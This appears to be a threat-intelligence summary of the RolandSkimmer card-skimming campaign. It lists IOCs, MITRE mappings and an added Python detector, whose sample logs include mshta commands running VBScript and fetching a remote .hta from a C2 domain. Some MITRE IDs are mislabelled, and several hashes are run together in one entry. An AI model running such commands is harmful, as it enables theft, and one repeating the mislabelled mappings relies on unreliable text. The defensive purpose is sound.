RolandSkimmer: Silent Credit Card Thief Uncovered

The “RolandSkimmer” campaign uses malicious browser extensions and LNK files to carry out persistent credit card skimming attacks, primarily targeting users in Bulgaria. The malware collects sensitive data through deceptive mechanisms while remaining stealthy and adapting to its victims’ environments.

Affected: Microsoft Windows, Chrome, Edge, Firefox

Key points:

  • The “RolandSkimmer” campaign targets Microsoft Windows users through malicious LNK files and browser extensions.
  • Malware is spread via a deceptive ZIP file that executes obfuscated scripts when a shortcut file is opened.
  • It conducts system reconnaissance to gather information about the victim’s environment.
  • Additional malicious files for various browsers are downloaded to perform data harvesting.
  • The campaign employs tactics to achieve stealth, persistence, and data exfiltration.
  • Credit card information is captured by intercepting form submissions without being detected.
  • FortiGuard Labs provides detection solutions to block these threats efficiently.

MITRE Techniques:

  • T1203 – Exploit Public-Facing Application: The attacker exploits users via malicious LNK files.
  • T1071 – Application Layer Protocol: The malware communicates with its command and control (C2) server over HTTP/S to relay captured data.
  • T1480 – Execution through API: Uses VBScript with mshta.exe to execute commands remotely.
  • T1041 – Exfiltration Over Command and Control Channel: Captured credit card data is sent to the C2 server.
  • T1070 – Indicator Removal on Host: The attacker does not alter legitimate browser binaries to avoid detection.

Indicators of Compromise:

  • [Domain] invsetmx[.]com
  • [Domain] fzhivka-001-site1[.]btempurl[.]com
  • [Domain] exmkleo[.]com
  • [Domain] bg3dsec[.]com
  • [SHA256] 80e0aa05ffd973decf9b7f435c5a44574e4c8314c152c7a09e00c821828fe515e30eecb53e4b03cfada8791877c3c67e009d25bb4d57f01f9eb7cd1121ac1908e0898e5d1f71bb0311ddfdef9697f684da6da701ad36ab8107dcb5d5e438838838d
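An added detection example, not code from the Fortinet write-up: it refangs the listed C2 domains and scans constructed, Sysmon-style process-creation and DNS log lines for the execution pattern summarized above (mshta.exe launched with an inline vbscript: payload or a remote URL) and for lookups of the listed domains. The log format and sample lines are assumptions for illustration.

```python
import re

# Indicators as listed in the write-up above (defanged with "[.]"), refanged for matching.
DEFANGED_C2_DOMAINS = ["invsetmx[.]com", "fzhivka-001-site1[.]btempurl[.]com",
                       "exmkleo[.]com", "bg3dsec[.]com"]
C2_DOMAINS = {d.replace("[.]", ".").lower() for d in DEFANGED_C2_DOMAINS}

# Constructed, Sysmon-style key=value log lines (sample data, not from the report).
SAMPLE_EVENTS = [
    'event=ProcessCreate parent=explorer.exe image=mshta.exe cmdline="mshta.exe vbscript:Execute(...)"',
    'event=ProcessCreate parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"',
    'event=DnsQuery image=mshta.exe query=invsetmx.com',
    'event=DnsQuery image=chrome.exe query=example.org',
    'event=ProcessCreate parent=winword.exe image=mshta.exe cmdline="mshta.exe https://fzhivka-001-site1.btempurl.com/x.hta"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Parse one key=value line; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}

def is_mshta_script_exec(ev):
    """mshta.exe given an inline vbscript: payload or a remote URL, the execution
    pattern the summary above maps to T1480."""
    if ev.get("event") != "ProcessCreate" or ev.get("image", "").lower() != "mshta.exe":
        return False
    cmd = ev.get("cmdline", "").lower()
    return "vbscript:" in cmd or "http://" in cmd or "https://" in cmd

def c2_domain_hit(ev):
    """Return the listed domain matched by a DNS query for it or any subdomain, else None."""
    q = ev.get("query", "").lower().rstrip(".")
    return next((d for d in C2_DOMAINS if q == d or q.endswith("." + d)), None)

def scan(lines):
    """Return (reason, line) alerts for every line matching a detection above."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if is_mshta_script_exec(ev):
            alerts.append(("mshta-script-execution", line))
        if ev.get("event") == "DnsQuery" and (hit := c2_domain_hit(ev)):
            alerts.append(("c2-domain-dns:" + hit, line))
        cmd = ev.get("cmdline", "").lower()
        for d in C2_DOMAINS:
            if d in cmd:  # script fetched straight from a listed domain
                alerts.append(("c2-domain-in-cmdline:" + d, line))
    return alerts

if __name__ == "__main__":
    for reason, line in scan(SAMPLE_EVENTS):
        print(reason, "<-", line)
```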


Full Story: https://feeds.fortinet.com/~/916034477/0/fortinet/blog/threat-research~RolandSkimmer-Silent-Credit-Card-Thief-Uncovered
